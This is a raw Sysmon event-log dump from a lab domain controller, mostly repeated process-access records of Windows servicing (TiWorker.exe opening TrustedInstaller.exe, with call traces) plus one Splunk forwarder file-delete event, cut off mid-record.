12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.275{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.259{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.259{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.259{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.243{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:26.243{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08FA66DF045F433B259D417528BAE77F,SHA256=3B8FCA0C90131D6768E5B9539D970CF25760F5F2F92724A704CD7FC01948B1BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:26.228{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+6